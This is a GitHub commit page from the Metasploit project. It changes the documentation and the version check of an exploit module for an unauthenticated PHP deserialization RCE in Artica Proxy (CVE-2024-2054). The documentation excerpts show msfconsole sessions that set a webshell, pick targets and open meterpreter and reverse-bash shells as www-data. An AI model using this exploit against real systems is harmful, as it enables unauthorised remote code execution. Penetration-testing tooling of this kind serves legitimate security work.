module and documentation updates based on review comments (bwatters-r…

…7/cgranleese-r7)
rapid7 · Mar 21, 2024 · f217312 · f217312
1 parent e84fe94
commit f217312
Show file tree

Hide file tree

Showing 2 changed files with 5 additions and 5 deletions.
diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md
@@ -46,7 +46,7 @@ For the native PHP target, by default the `eval()` function will be used for nat
 
 ## Scenarios
 
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info
 
        Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
@@ -131,7 +131,7 @@ View the full module info with the info -d command.
 ```
 
 ### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo
 webshell => cuckoo
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0
@@ -160,7 +160,7 @@ Server username: www-data
 meterpreter >
 ```
 ### Target 1 - Unix Command `cmd/unix/reverse_bash` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
 target => 1
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit
@@ -179,7 +179,7 @@ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ```
 ### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
-```shell
+```msf
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
 target => 2
 msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb
@@ -168,7 +168,7 @@ def check
       return CheckCode::Unknown('No Artica version found.') if version_match.nil?
 
       version = version_match[0].split(' ')
-      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
+      if version.count > 1 && Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
         return CheckCode::Vulnerable("Artica version: #{version[1]}")
       else
         return CheckCode::Safe("Artica version: #{version[1]}")